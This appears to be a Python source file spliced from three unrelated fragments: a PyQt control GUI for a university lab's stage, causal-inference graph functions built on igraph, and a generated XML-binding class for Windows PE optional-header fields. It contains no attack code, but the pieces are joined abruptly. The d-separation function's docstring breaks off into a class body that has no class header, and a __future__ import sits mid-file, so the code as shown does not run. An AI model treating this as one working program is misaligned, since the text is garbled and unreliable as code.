# mb.setTextFormat(Qt.RichText)
# mb.setDetailedText(message)
# _msgBox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.winAudioSetMuted(True)
ret = _msgBox.exec_()
self.winAudioSetMuted(False)
return ret
# https://doc.qt.io/qt-5/qprogressdialog.html
def progressDialog(self, host = None, title = "Progress", labelText = None, cancelButtonText = "Cancel", range = (0, 100)):
# QProgressDialog::QProgressDialog(const QString &labelText, const QString &cancelButtonText, int minimum, int maximum, QWidget *parent = nullptr, Qt::WindowFlags f = Qt::WindowFlags())
# NOTE: DOES NOT EXEC
pDialog = QtWidgets.QProgressDialog(labelText, cancelButtonText, range[0], range[1], host)
pDialog.setWindowFlags(QtCore.Qt.WindowTitleHint | QtCore.Qt.Dialog | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.CustomizeWindowHint)
pDialog.setWindowTitle(title)
pDialog.setWindowModality(QtCore.Qt.WindowModal)
# Get height and width
_h = pDialog.height()
_w = pDialog.width()
pDialog.setGeometry(0, 0, _w, _h)
moveToCentre(pDialog)
self.lastPDialogUpdate = datetime.datetime.now()
return pDialog
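# A minimal usage sketch (assumed, not from the original code): progressDialog() does not exec
# the dialog, so a caller would typically hold on to it and drive it through the throttled
# helpers above, e.g.
#     self.pDialog = self.progressDialog(host = self, labelText = "Working...", range = (0, 100))
#     self.pDialog.show()
#     self.pDialog_setValue(42)            # rate-limited by PDIALOG_TIMEOUT
#     self.pDialog_setLabelText("Step 2")  # likewise rate-limited
# QProgressDialog closes itself once the maximum value is reached (or call reset()).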
operationDone = QtCore.pyqtSignal()
def on_operationDone(self):
self.informationDialog(message = "Operation Completed!", title = "Done!", host = self)
if self.stageControl.musicProcess and self.stageControl.musicProcess.is_alive():
try:
self.stageControl.musicProcess.terminate()
except Exception as e:
self.logconsole("{}: {}".format(type(e).__name__, e))
picConvWarn = QtCore.pyqtSignal('QString', 'QString')
# [str, str]
def on_picConvWarn(self, message, error):
return self.criticalDialog(message = message, title = "PicConv Error!", informativeText = error, host = self)
# Status Bar
class aboutPopUp(QtWidgets.QDialog):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.initUI()
def initUI(self):
# x, y, w, h
self.setGeometry(0, 0, 250, 200)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose) # WidgetAttribute.
self.setWindowTitle("About")
moveToCentre(self)
self._main_layout = QtWidgets.QVBoxLayout()
# setContentsMargins(left, top, right, bottom)
self._main_layout.setContentsMargins(10, 10, 10, 10)
one = QtWidgets.QLabel("Made by")
one.setAlignment(QtCore.Qt.AlignCenter)
two = QtWidgets.QLabel("<NAME>, <NAME>\n2019")
two.setAlignment(QtCore.Qt.AlignCenter)
ema = QtWidgets.QLabel()
dianyous = [
["sunyudong", "outlook.sg"],
["mingsongwu", "outlook.sg"]
]
ema.setText("<a href=\"mailto:{}\" title=\"Please don't spam us thanks\">sunyudong [at] outlook [dot] sg</a><br/><a href=\"mailto:{}\" title=\"Please don't spam us thanks\">mingsongwu [at] outlook [dot] sg</a>".format(*map("@".join, dianyous)))
ema.setTextFormat(QtCore.Qt.RichText)
ema.setTextInteractionFlags(QtCore.Qt.TextBrowserInteraction)
ema.setOpenExternalLinks(True)
ema.setAlignment(QtCore.Qt.AlignCenter)
thr = QtWidgets.QLabel("NUS Nanomaterials Lab")
thr.setAlignment(QtCore.Qt.AlignCenter)
self._main_layout.addWidget(one)
self._main_layout.addWidget(two)
self._main_layout.addWidget(ema)
self._main_layout.addWidget(thr)
self.setLayout(self._main_layout)
class SettingsScreen(QtWidgets.QDialog):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.microGUIParent = self.parentWidget()
self.initUI()
def initUI(self):
self.setWindowTitle("Settings")
# x, y ,w, h
self.setGeometry(0, 0, 500, 300)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
moveToCentre(self)
self.makeUI()
self.loadSettings()
self.initEventListeners()
def makeUI(self):
self._main_layout = QtWidgets.QGridLayout()
# Optomechanical
_servos = QtWidgets.QGroupBox("Optomechanical")
_servos_layout = QtWidgets.QGridLayout()
self._shutterAbsoluteMode = QtWidgets.QCheckBox("Use Absolute Mode for Shutter")
self._powerAbsoluteMode = QtWidgets.QCheckBox("Use Absolute Mode for Power")
_shutterChannel_label_main = QtWidgets.QLabel("Shutter Channel")
_shutterChannel_label_left = QtWidgets.QLabel("Left")
_shutterChannel_label_righ = QtWidgets.QLabel("Right")
_shutterChannel_label_main.setAlignment(QtCore.Qt.AlignTop)
_shutterChannel_label_left.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)
_shutterChannel_label_righ.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignTop)
self._shutterChannel = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self._shutterChannel.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self._shutterChannel.setRange(0, 1)
self._shutterChannel.setSingleStep(1)
self._shutterChannel.setPageStep(1)
self._shutterChannel.setTickInterval(1)
# We use this workaround of restricting the slider range to 0..1 because mouse events are not affected by the settings above
# addWidget(QWidget * widget, int fromRow, int fromColumn, int rowSpan, int columnSpan, Qt::Alignment alignment = 0)
_servos_layout.addWidget(self._shutterAbsoluteMode, 0, 0, 1, 3)
_servos_layout.addWidget(self._powerAbsoluteMode, 1, 0, 1, 3)
_servos_layout.addWidget(_shutterChannel_label_main, 2, 0, 2, 1)
_servos_layout.addWidget(self._shutterChannel, 2, 1, 1, 2)
_servos_layout.addWidget(_shutterChannel_label_left, 3, 1, 1, 1)
_servos_layout.addWidget(_shutterChannel_label_righ, 3, 2, 1, 1)
_servos_layout.setColumnStretch(0, 2)
_servos_layout.setColumnStretch(1, 1)
_servos_layout.setColumnStretch(2, 1)
_servos.setLayout(_servos_layout)
# / Optomechanical
# Stage Configuration
# These are the initialization settings and do not affect the current session!
_stage = QtWidgets.QGroupBox("Stage Settings")
_stage_layout = QtWidgets.QGridLayout()
_stage_xlim_label = QtWidgets.QLabel("X-Limits")
self._stage_xlim_lower = QtWidgets.QLineEdit()
self._stage_xlim_lower.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._stage_xlim_upper = QtWidgets.QLineEdit()
self._stage_xlim_upper.setValidator(QtGui.QDoubleValidator()) # Accept any Double
_stage_ylim_label = QtWidgets.QLabel("Y-Limits")
self._stage_ylim_lower = QtWidgets.QLineEdit()
self._stage_ylim_lower.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._stage_ylim_upper = QtWidgets.QLineEdit()
self._stage_ylim_upper.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._noHome = QtWidgets.QCheckBox("Do not home stage on start")
_note = QtWidgets.QLabel("Limits and Homing Settings take effect only after app restart!\nStage will be initialised in the center of the limits")
_note.setStyleSheet("color: red;")
self._invertx = QtWidgets.QCheckBox("Invert Horizontal")
self._inverty = QtWidgets.QCheckBox("Invert Vertical")
from __future__ import annotations
import igraph
import copy
import numpy
from typing import List
from dataclasses import dataclass, field
def observed_graph(g):
"""
Constructs a subgraph containing only observed edges
:param g: Input graph
:return: Subgraph containing only observed edges
"""
g_obs = copy.deepcopy(g)
unobs_edges = g_obs.es.select(description="U")
g_obs.delete_edges(unobs_edges)
return g_obs
def unobserved_graph(g):
"""
Constructs an unobserved graph
:param g: Input graph
:return: unobserved graph
"""
g_copy = copy.deepcopy(g)
unobs_edges = g_copy.es.select(description="U")
u1 = len(unobs_edges)
if u1 > 0:
u = g_copy.es.select(description="U")
edges_to_remove = []
for edge in u:
edge_tuple = edge.tuple
if edge_tuple[1] > edge_tuple[0]:
edges_to_remove.append(edge.index)
g_copy.delete_edges(edges_to_remove)
e = g_copy.es.select(description="U")
e_len = len(e)
new_nodes = []
for i in range(e_len):
new_nodes.append(f"u_{i + 1}")
g_copy.add_vertices(new_nodes, attributes={"description": ["U"] * e_len})
edge_list = []
# We have now inserted new unobserved nodes into the graph
# We replace the unobserved bi-directed edges with new edges pointing away from the new unobserved nodes
# a is the index of the new unobserved node
# b and c are the two nodes that were previously connected by a bi-directed edge
for i in range(e_len): # Loop through unobserved edges
a = g_copy.vs.select(name=new_nodes[i]).indices[0]
b = e[i].tuple[0]
edge_list.append((a, b))
c = e[i].tuple[1]
edge_list.append((a, c))
g_copy.add_edges(edge_list, attributes={"description": ["O"] * len(edge_list)})
obs_edges = g_copy.es.select(description_ne="U")
g_unobs = g_copy.subgraph_edges(obs_edges, delete_vertices=False)
return g_unobs
return g
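def _demo_unobserved_graph():
    # Minimal sketch of the edge convention assumed above (this helper is illustrative and not
    # part of the original module): a bi-directed/confounded pair X <-> Y is stored as two
    # reciprocal directed edges, both tagged description="U".
    g = igraph.Graph(directed=True)
    g.add_vertices(["X", "Y"])
    g.add_edges([("X", "Y"), ("Y", "X")], attributes={"description": ["U", "U"]})
    # unobserved_graph() keeps one edge of the pair, adds a fresh latent vertex u_1 and rewires
    # it as observed edges u_1 -> X and u_1 -> Y.
    return unobserved_graph(g)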
def ts(nodes, topo_order): # topo must be a list of names
"""
Orders nodes by their topological order
:param nodes: Nodes to be ordered
:param topo_order: Order to arrange nodes
:return: Ordered nodes (indices)
"""
node_set = set(nodes)
return [n for n in topo_order if n in node_set]
def to_names(indices, g):
"""
converts vertex indices to vertex names
:param indices: list of indices
:param g: graph (with named nodes)
:return: list of vertex names
"""
name_list = g.vs["name"]
name_sorted = [name_list[i] for i in indices]
return name_sorted
def find_related_nodes_of(nodes, g, mode, order=1, topo=None, exclude_orig=False):
"""
Finds all related nodes of a set by "mode" and optionally sorts them in topological order
:param nodes: a list of nodes
:param g: iGraph graph
:param mode: "in" to return ancestors of nodes,
"out" to return descendants of nodes,
"all" to return all connected nodes
:param order: if an int, the maximum number of steps to take from nodes;
if "max", all reachable nodes are found
:param topo: topological order in which the return should be sorted
:param exclude_orig: if True, the nodes in "nodes" will be removed from the return
:return: the (optionally ordered) related nodes
"""
# Check that mode is specified correctly
if mode not in ["in", "out", "all"]:
raise ValueError('Invalid mode specified, select from: "in", "out", or "all"')
# Check that order is specified correctly, and compute g.vcount() if necessary
if type(order) == int:
order_to_pass = order
elif order == "max":
order_to_pass = g.vcount()
else:
raise ValueError('Invalid order specified, specify an integer or "max"')
# Find the correct nodes
related_list = g.neighborhood(nodes, order=order_to_pass, mode=mode)
related_ind = list(set([node for related_nodes in related_list for node in related_nodes]))
related_names = to_names(related_ind, g)
# Remove the original nodes, if desired
if exclude_orig:
for node in nodes:
related_names.remove(node)
# Sort nodes into specified topological order, if desired
if topo is not None:
related_names_sorted = ts(related_names, topo)
return related_names_sorted
return related_names
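def _demo_find_related_nodes_of():
    # Illustrative usage sketch (assumed example graph; this helper is not part of the original
    # module): collect the ancestors of Y in topological order, excluding Y itself.
    g = igraph.Graph(directed=True)
    g.add_vertices(["X", "Z", "Y"])
    g.add_edges([("X", "Z"), ("Z", "Y")])
    topo = ["X", "Z", "Y"]
    # mode="in" walks edges backwards, order="max" follows them as far as possible.
    # Expected result here: ["X", "Z"]
    return find_related_nodes_of(["Y"], g, mode="in", order="max", topo=topo, exclude_orig=True)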
#
#
# # Assume "O" and "U" are specified in "description" attribute
# def compare_graphs(g1, g2):
# """
# Determines if two graphs are the same (including edge descriptions)
# :param g1: First graph
# :param g2: Second graph
# :return: T/F indicating if G1 is the same as G2
# """
# e1 = numpy.array(g1.get_edgelist())
# n1 = numpy.shape(e1)[0]
# e2 = numpy.array(g2.get_edgelist())
# n2 = numpy.shape(e2)[0]
# if n1 != n2:
# return False
# if "description" in g1.es.attributes():
# e1 = numpy.append(e1, numpy.transpose([g1.es["description"]]), axis=1)
# else:
# e1 = numpy.append(e1, numpy.transpose([numpy.repeat("O", n1)]), axis=1)
# if "description" in g2.es.attributes():
# e2 = numpy.append(e2, numpy.transpose([g2.es["description"]]), axis=1)
# else:
# e2 = numpy.append(e2, numpy.transpose([numpy.repeat("O", n2)]), axis=1)
# return numpy.array_equal(e1, e2)
# Edge Selection Function (for line 3 section of ID)
def eselect(x, g):
"""
Determines which edges should remain when cutting incoming arrows to x
:param x: list of vertices
:param g: graph
:return: list of edges to keep
"""
edges = set(g.es.select().indices)
to = set(g.es.select(_to_in=g.vs.select(name_in=x).indices).indices)
frm = set(g.es.select(_from_in=g.vs.select(name_in=x).indices).indices)
description = set(g.es.select(description="U").indices)
selection = edges - (to | (frm & description))
return list(selection)
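def _demo_eselect():
    # Illustrative usage sketch (assumed example graph; this helper is not part of the original
    # module): build the graph with all arrows into X removed by keeping only the edges that
    # eselect() returns.
    g = igraph.Graph(directed=True)
    g.add_vertices(["W", "X", "Y"])
    g.add_edges([("W", "X"), ("X", "Y")], attributes={"description": ["O", "O"]})
    keep = eselect(["X"], g)  # drops W -> X, keeps X -> Y
    return g.subgraph_edges(keep, delete_vertices=False)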
def eselect2(g, x, z):
"""
For use in compute_IDC. Selects all edges in g except incoming to x and outgoing from z.
:param g: graph
:param x: nodes
:param z: nodes
:return: The set of edges in g that are not incoming to x or outgoing from z.
"""
edges = set(g.es.select().indices)
to_x = set(g.es.select(_to_in=g.vs.select(name_in=x).indices).indices)
from_z = set(g.es.select(_from_in=g.vs.select(name_in=z).indices).indices)
selection = edges - to_x - from_z
return selection
def get_expression(prob, start_sum=False, single_source=False, target_sym="^*("):
"""
Converts a class probability object to LaTeX plaintext
:param prob: an object of class probability
:param start_sum: should a sum be started
:param single_source: is there only one source?
:param target_sym: LaTeX fragment inserted after "P" for the target domain (defaults to "^*(", giving e.g. P^*(y))
:return: LaTeX plaintext
"""
p = ""
s_print = len(prob.sumset) > 0
if s_print:
sum_string = ",".join(prob.sumset)
if start_sum:
p = f"{p}\\left(\\sum_{{{sum_string}}}"
else:
p = f"{p}\\sum_{{{sum_string}}}"
if prob.fraction:
f_num = get_expression(prob.num, start_sum=False, single_source=single_source, target_sym=target_sym)
f_den = get_expression(prob.den, start_sum=False, single_source=single_source, target_sym=target_sym)
p = f"{p}\\frac{{{f_num}}}{{{f_den}}}"
# if prob.sum:
# p = f"{p}\\left("
# add_strings = []
# i = 1
# for child in prob.children:
# new_sum = False
# if child.product or child.sum:
# new_sum = True
# child_ge = get_expression(child, start_sum=new_sum, single_source=single_source, target_sym=target_sym)
# to_append = f"w_{{{i}}}^{{({child.weight})}}{child_ge}"
# add_strings.append(to_append)
# i = i + 1
# con_strings = "".join(add_strings)
# p = f"{p}{con_strings}\\right)"
if prob.product:
for child in prob.children:
new_sum = False
if child.product or child.sum:
new_sum = True
child_ge = get_expression(child, start_sum=new_sum, single_source=single_source, target_sym=target_sym)
p = f"{p}{child_ge}"
if not (prob.sum or prob.product or prob.fraction):
p = f"{p}P"
if len(prob.do) > 0:
do_string = "".join(prob.do)
p = f"{p}_{{{do_string}}}"
var_string = ",".join(prob.var)
if prob.domain > 0:
if prob.domain == 1:
p = f"{p}{target_sym}{var_string}"
else:
if single_source:
p = f"{p}({var_string}"
else:
p = f"{p}^{{({str(prob.domain - 1)}}}({var_string}"
else:
p = f"{p}({var_string}"
if len(prob.cond) > 0:
cond_string = ",".join(prob.cond) # prob.cond must have elements that are strings
cond_string = f"\u007C{cond_string})"
else:
cond_string = ")"
p = f"{p}{cond_string}"
if s_print and start_sum:
p = ",".join([p, "\\right)"])
return p
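# Illustrative sketch of the output, using the field names read above (the example values are
# assumed, not from the original code): for a probability object with sumset=["z"], var=["y"],
# cond=["x"], do empty, domain=0 and no product/fraction flags set, get_expression() yields
#     \sum_{z}P(y|x)
# A fraction nests two such strings inside \frac{...}{...}, and a product simply concatenates
# the children's expressions in order.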
def c_components(g, topo):
"""
Finds c-components in graph g
:param g: graph
:param topo: topological ordering
:return: list of c-components (each c-component is a list of nodes)
"""
a = g.get_adjacency()
n = a.shape[0]
v = g.vs["name"]
bidirected = []
for i in range(0, n):
for j in range(i+1, n):
if a[i][j] >= 1 and a[j][i] >= 1:
bidirected.append(i)
bidirected.append(j)
bidirected_edges = g.es.select(_within=bidirected)
g_bidirected = g.subgraph_edges(bidirected_edges, delete_vertices=False)
subgraphs = g_bidirected.decompose()
cc = []
cc_rank = []
for subgraph in subgraphs:
nodes = ts(subgraph.vs["name"], topo)
cc.append(nodes)
rank = 0
for node in nodes:
rank = rank + topo.index(node)
cc_rank.append(rank)
(cc_sorted, _) = list(map(list, zip(*sorted(zip(cc, cc_rank), key=lambda ab: ab[1], reverse=True))))
return cc_sorted
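def _demo_c_components():
    # Illustrative usage sketch (assumed example graph; this helper is not part of the original
    # module): X <-> Y are confounded (encoded as reciprocal directed edges, matching the
    # adjacency test in c_components()), and Y -> Z is an ordinary edge.
    g = igraph.Graph(directed=True)
    g.add_vertices(["X", "Y", "Z"])
    g.add_edges([("X", "Y"), ("Y", "X"), ("Y", "Z")])
    topo = ["X", "Y", "Z"]
    # Expected: [["Z"], ["X", "Y"]] -- every vertex outside a bidirected component forms its own
    # c-component, and components are returned in decreasing order of summed topological rank.
    return c_components(g, topo)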
def parse_joint(p, v, cond, var, topo):
p_new = Probability()
p_num = copy.deepcopy(p)
p_num.sumset = ts(set(p.sumset) | (set(var) - set(v) - set(cond)), topo)
if len(cond) > 0:
p_den = copy.deepcopy(p)
p_den.sumset = ts(set(p.sumset) | (set(var) - set(cond)), topo)
p_new.fraction = True
p_new.num = copy.deepcopy(p_num)
p_new.den = copy.deepcopy(p_den)
else:
p_new = copy.deepcopy(p_num)
return p_new
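# Worked sketch of what parse_joint() constructs (notation only, not from the original code):
# starting from a probability object p over the variable set var, the conditional P(v | cond)
# is expressed as
#     sum_{var \ v \ cond} p   /   sum_{var \ cond} p
# i.e. a fraction of two marginalisations of the same object; when cond is empty only the
# numerator marginalisation is needed, so the fraction is skipped.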
def wrap_d_sep(g, x, y, z):
"""
Does some quick checks before testing d-separation
:param g: Graph
:param x: nodes
:param y: nodes
:param z: nodes
:return: T/F if x is separated from y given z in g
"""
if x == y:
return False
if len(x) == 0 or len(y) == 0:
return True
return d_sep(g, x, y, z)
def d_sep(g, x, y, z):
"""
From R package causaleffect:
"Implements relevant path separation (rp-separation) for testing d-separation. For details, see:
Relevant Path Separation: A Faster Method for Testing Independencies in Bayesian Networks
<NAME>, <NAME>, <NAME>;
Proceedings of the Eighth International Conference on Probabilistic Graphical Models,
PMLR 52:74-85, 2016."
:param g: graph
:param x: nodes
:param y: nodes
:param z: nodes
:return: T/F if x is separated from y given z in g
included."""
subclass = None
superclass = None
def __init__(self, Magic=None, Major_Linker_Version=None, Minor_Linker_Version=None, Size_Of_Code=None, Size_Of_Initialized_Data=None, Size_Of_Uninitialized_Data=None, Address_Of_Entry_Point=None, Base_Of_Code=None, Base_Of_Data=None, Image_Base=None, Section_Alignment=None, File_Alignment=None, Major_OS_Version=None, Minor_OS_Version=None, Major_Image_Version=None, Minor_Image_Version=None, Major_Subsystem_Version=None, Minor_Subsystem_Version=None, Win32_Version_Value=None, Size_Of_Image=None, Size_Of_Headers=None, Checksum=None, Subsystem=None, DLL_Characteristics=None, Size_Of_Stack_Reserve=None, Size_Of_Stack_Commit=None, Size_Of_Heap_Reserve=None, Size_Of_Heap_Commit=None, Loader_Flags=None, Number_Of_Rva_And_Sizes=None, Data_Directory=None, Hashes=None):
self.Magic = Magic
self.Major_Linker_Version = Major_Linker_Version
self.Minor_Linker_Version = Minor_Linker_Version
self.Size_Of_Code = Size_Of_Code
self.Size_Of_Initialized_Data = Size_Of_Initialized_Data
self.Size_Of_Uninitialized_Data = Size_Of_Uninitialized_Data
self.Address_Of_Entry_Point = Address_Of_Entry_Point
self.Base_Of_Code = Base_Of_Code
self.Base_Of_Data = Base_Of_Data
self.Image_Base = Image_Base
self.Section_Alignment = Section_Alignment
self.File_Alignment = File_Alignment
self.Major_OS_Version = Major_OS_Version
self.Minor_OS_Version = Minor_OS_Version
self.Major_Image_Version = Major_Image_Version
self.Minor_Image_Version = Minor_Image_Version
self.Major_Subsystem_Version = Major_Subsystem_Version
self.Minor_Subsystem_Version = Minor_Subsystem_Version
self.Win32_Version_Value = Win32_Version_Value
self.Size_Of_Image = Size_Of_Image
self.Size_Of_Headers = Size_Of_Headers
self.Checksum = Checksum
self.Subsystem = Subsystem
self.DLL_Characteristics = DLL_Characteristics
self.Size_Of_Stack_Reserve = Size_Of_Stack_Reserve
self.Size_Of_Stack_Commit = Size_Of_Stack_Commit
self.Size_Of_Heap_Reserve = Size_Of_Heap_Reserve
self.Size_Of_Heap_Commit = Size_Of_Heap_Commit
self.Loader_Flags = Loader_Flags
self.Number_Of_Rva_And_Sizes = Number_Of_Rva_And_Sizes
self.Data_Directory = Data_Directory
self.Hashes = Hashes
def factory(*args_, **kwargs_):
if PEOptionalHeaderType.subclass:
return PEOptionalHeaderType.subclass(*args_, **kwargs_)
else:
return PEOptionalHeaderType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Magic(self): return self.Magic
def set_Magic(self, Magic): self.Magic = Magic
def get_Major_Linker_Version(self): return self.Major_Linker_Version
def set_Major_Linker_Version(self, Major_Linker_Version): self.Major_Linker_Version = Major_Linker_Version
def get_Minor_Linker_Version(self): return self.Minor_Linker_Version
def set_Minor_Linker_Version(self, Minor_Linker_Version): self.Minor_Linker_Version = Minor_Linker_Version
def get_Size_Of_Code(self): return self.Size_Of_Code
def set_Size_Of_Code(self, Size_Of_Code): self.Size_Of_Code = Size_Of_Code
def get_Size_Of_Initialized_Data(self): return self.Size_Of_Initialized_Data
def set_Size_Of_Initialized_Data(self, Size_Of_Initialized_Data): self.Size_Of_Initialized_Data = Size_Of_Initialized_Data
def get_Size_Of_Uninitialized_Data(self): return self.Size_Of_Uninitialized_Data
def set_Size_Of_Uninitialized_Data(self, Size_Of_Uninitialized_Data): self.Size_Of_Uninitialized_Data = Size_Of_Uninitialized_Data
def get_Address_Of_Entry_Point(self): return self.Address_Of_Entry_Point
def set_Address_Of_Entry_Point(self, Address_Of_Entry_Point): self.Address_Of_Entry_Point = Address_Of_Entry_Point
def get_Base_Of_Code(self): return self.Base_Of_Code
def set_Base_Of_Code(self, Base_Of_Code): self.Base_Of_Code = Base_Of_Code
def get_Base_Of_Data(self): return self.Base_Of_Data
def set_Base_Of_Data(self, Base_Of_Data): self.Base_Of_Data = Base_Of_Data
def get_Image_Base(self): return self.Image_Base
def set_Image_Base(self, Image_Base): self.Image_Base = Image_Base
def get_Section_Alignment(self): return self.Section_Alignment
def set_Section_Alignment(self, Section_Alignment): self.Section_Alignment = Section_Alignment
def get_File_Alignment(self): return self.File_Alignment
def set_File_Alignment(self, File_Alignment): self.File_Alignment = File_Alignment
def get_Major_OS_Version(self): return self.Major_OS_Version
def set_Major_OS_Version(self, Major_OS_Version): self.Major_OS_Version = Major_OS_Version
def get_Minor_OS_Version(self): return self.Minor_OS_Version
def set_Minor_OS_Version(self, Minor_OS_Version): self.Minor_OS_Version = Minor_OS_Version
def get_Major_Image_Version(self): return self.Major_Image_Version
def set_Major_Image_Version(self, Major_Image_Version): self.Major_Image_Version = Major_Image_Version
def get_Minor_Image_Version(self): return self.Minor_Image_Version
def set_Minor_Image_Version(self, Minor_Image_Version): self.Minor_Image_Version = Minor_Image_Version
def get_Major_Subsystem_Version(self): return self.Major_Subsystem_Version
def set_Major_Subsystem_Version(self, Major_Subsystem_Version): self.Major_Subsystem_Version = Major_Subsystem_Version
def get_Minor_Subsystem_Version(self): return self.Minor_Subsystem_Version
def set_Minor_Subsystem_Version(self, Minor_Subsystem_Version): self.Minor_Subsystem_Version = Minor_Subsystem_Version
def get_Win32_Version_Value(self): return self.Win32_Version_Value
def set_Win32_Version_Value(self, Win32_Version_Value): self.Win32_Version_Value = Win32_Version_Value
def get_Size_Of_Image(self): return self.Size_Of_Image
def set_Size_Of_Image(self, Size_Of_Image): self.Size_Of_Image = Size_Of_Image
def get_Size_Of_Headers(self): return self.Size_Of_Headers
def set_Size_Of_Headers(self, Size_Of_Headers): self.Size_Of_Headers = Size_Of_Headers
def get_Checksum(self): return self.Checksum
def set_Checksum(self, Checksum): self.Checksum = Checksum
def get_Subsystem(self): return self.Subsystem
def set_Subsystem(self, Subsystem): self.Subsystem = Subsystem
def get_DLL_Characteristics(self): return self.DLL_Characteristics
def set_DLL_Characteristics(self, DLL_Characteristics): self.DLL_Characteristics = DLL_Characteristics
def get_Size_Of_Stack_Reserve(self): return self.Size_Of_Stack_Reserve
def set_Size_Of_Stack_Reserve(self, Size_Of_Stack_Reserve): self.Size_Of_Stack_Reserve = Size_Of_Stack_Reserve
def get_Size_Of_Stack_Commit(self): return self.Size_Of_Stack_Commit
def set_Size_Of_Stack_Commit(self, Size_Of_Stack_Commit): self.Size_Of_Stack_Commit = Size_Of_Stack_Commit
def get_Size_Of_Heap_Reserve(self): return self.Size_Of_Heap_Reserve
def set_Size_Of_Heap_Reserve(self, Size_Of_Heap_Reserve): self.Size_Of_Heap_Reserve = Size_Of_Heap_Reserve
def get_Size_Of_Heap_Commit(self): return self.Size_Of_Heap_Commit
def set_Size_Of_Heap_Commit(self, Size_Of_Heap_Commit): self.Size_Of_Heap_Commit = Size_Of_Heap_Commit
def get_Loader_Flags(self): return self.Loader_Flags
def set_Loader_Flags(self, Loader_Flags): self.Loader_Flags = Loader_Flags
def get_Number_Of_Rva_And_Sizes(self): return self.Number_Of_Rva_And_Sizes
def set_Number_Of_Rva_And_Sizes(self, Number_Of_Rva_And_Sizes): self.Number_Of_Rva_And_Sizes = Number_Of_Rva_And_Sizes
def get_Data_Directory(self): return self.Data_Directory
def set_Data_Directory(self, Data_Directory): self.Data_Directory = Data_Directory
def get_Hashes(self): return self.Hashes
def set_Hashes(self, Hashes): self.Hashes = Hashes
def export(self, outfile, level, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PEOptionalHeaderType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType'):
pass
def exportChildren(self, outfile, level, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType', fromsubclass_=False):
if self.Magic is not None:
self.Magic.export(outfile, level, namespace_, name_='Magic')
if self.Major_Linker_Version is not None:
self.Major_Linker_Version.export(outfile, level, namespace_, name_='Major_Linker_Version')
if self.Minor_Linker_Version is not None:
self.Minor_Linker_Version.export(outfile, level, namespace_, name_='Minor_Linker_Version')
if self.Size_Of_Code is not None:
self.Size_Of_Code.export(outfile, level, namespace_, name_='Size_Of_Code')
if self.Size_Of_Initialized_Data is not None:
self.Size_Of_Initialized_Data.export(outfile, level, namespace_, name_='Size_Of_Initialized_Data')
if self.Size_Of_Uninitialized_Data is not None:
self.Size_Of_Uninitialized_Data.export(outfile, level, namespace_, name_='Size_Of_Uninitialized_Data')
if self.Address_Of_Entry_Point is not None:
self.Address_Of_Entry_Point.export(outfile, level, namespace_, name_='Address_Of_Entry_Point')
if self.Base_Of_Code is not None:
self.Base_Of_Code.export(outfile, level, namespace_, name_='Base_Of_Code')
if self.Base_Of_Data is not None:
self.Base_Of_Data.export(outfile, level, namespace_, name_='Base_Of_Data')
if self.Image_Base is not None:
self.Image_Base.export(outfile, level, namespace_, name_='Image_Base')
if self.Section_Alignment is not None:
self.Section_Alignment.export(outfile, level, namespace_, name_='Section_Alignment')
if self.File_Alignment is not None:
self.File_Alignment.export(outfile, level, namespace_, name_='File_Alignment')
if self.Major_OS_Version is not None:
self.Major_OS_Version.export(outfile, level, namespace_, name_='Major_OS_Version')
if self.Minor_OS_Version is not None:
self.Minor_OS_Version.export(outfile, level, namespace_, name_='Minor_OS_Version')
if self.Major_Image_Version is not None:
self.Major_Image_Version.export(outfile, level, namespace_, name_='Major_Image_Version')
if self.Minor_Image_Version is not None:
self.Minor_Image_Version.export(outfile, level, namespace_, name_='Minor_Image_Version')
if self.Major_Subsystem_Version is not None:
self.Major_Subsystem_Version.export(outfile, level, namespace_, name_='Major_Subsystem_Version')
if self.Minor_Subsystem_Version is not None:
self.Minor_Subsystem_Version.export(outfile, level, namespace_, name_='Minor_Subsystem_Version')
if self.Win32_Version_Value is not None:
self.Win32_Version_Value.export(outfile, level, namespace_, name_='Win32_Version_Value')
if self.Size_Of_Image is not None:
self.Size_Of_Image.export(outfile, level, namespace_, name_='Size_Of_Image')
if self.Size_Of_Headers is not None:
self.Size_Of_Headers.export(outfile, level, namespace_, name_='Size_Of_Headers')
if self.Checksum is not None:
self.Checksum.export(outfile, level, namespace_, name_='Checksum')
if self.Subsystem is not None:
self.Subsystem.export(outfile, level, namespace_, name_='Subsystem')
if self.DLL_Characteristics is not None:
self.DLL_Characteristics.export(outfile, level, namespace_, name_='DLL_Characteristics')
if self.Size_Of_Stack_Reserve is not None:
self.Size_Of_Stack_Reserve.export(outfile, level, namespace_, name_='Size_Of_Stack_Reserve')
if self.Size_Of_Stack_Commit is not None:
self.Size_Of_Stack_Commit.export(outfile, level, namespace_, name_='Size_Of_Stack_Commit')
if self.Size_Of_Heap_Reserve is not None:
self.Size_Of_Heap_Reserve.export(outfile, level, namespace_, name_='Size_Of_Heap_Reserve')
if self.Size_Of_Heap_Commit is not None:
self.Size_Of_Heap_Commit.export(outfile, level, namespace_, name_='Size_Of_Heap_Commit')
if self.Loader_Flags is not None:
self.Loader_Flags.export(outfile, level, namespace_, name_='Loader_Flags')
if self.Number_Of_Rva_And_Sizes is not None:
self.Number_Of_Rva_And_Sizes.export(outfile, level, namespace_, name_='Number_Of_Rva_And_Sizes')
